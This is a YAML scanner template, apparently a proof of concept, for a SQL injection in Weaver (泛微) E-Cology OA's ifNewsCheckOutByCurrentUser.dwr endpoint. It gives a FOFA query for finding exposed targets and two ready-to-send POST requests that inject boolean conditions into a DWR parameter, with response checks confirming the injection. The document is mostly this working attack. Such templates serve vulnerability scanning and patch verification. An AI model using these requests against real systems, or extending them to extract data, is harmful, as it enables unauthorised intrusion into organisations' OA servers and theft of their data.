product: 泛微E-Cology
vName: 泛微E-Cology CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微E-cology的ifNewsCheckOutByCurrentUser.dwr文件存在SQL注入漏洞。
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17673809.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr
      header:
        Content-Type: text/plain
      data: 'callCount=1
      page=
      httpSessionId=
      scriptSessionId=
      c0-scriptName=DocDwrUtil
      c0-methodName=ifNewsCheckOutByCurrentUser
      c0-id=0
      c0-param0=string:1 and 1=1
      c0-param1=string:1
      batchId=0'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - remoteHandleCallback
              - 'true'
            logic: and
  - exp:
      method: post
      follow: false
      path: /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr
      header:
        Content-Type: text/plain
      data: 'callCount=1
      page=
      httpSessionId=
      scriptSessionId=
      c0-scriptName=DocDwrUtil
      c0-methodName=ifNewsCheckOutByCurrentUser
      c0-id=0
      c0-param0=string:1 and 1=2
      c0-param1=string:1
      batchId=0'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - remoteHandleCallback
              - 'false'
            logic: and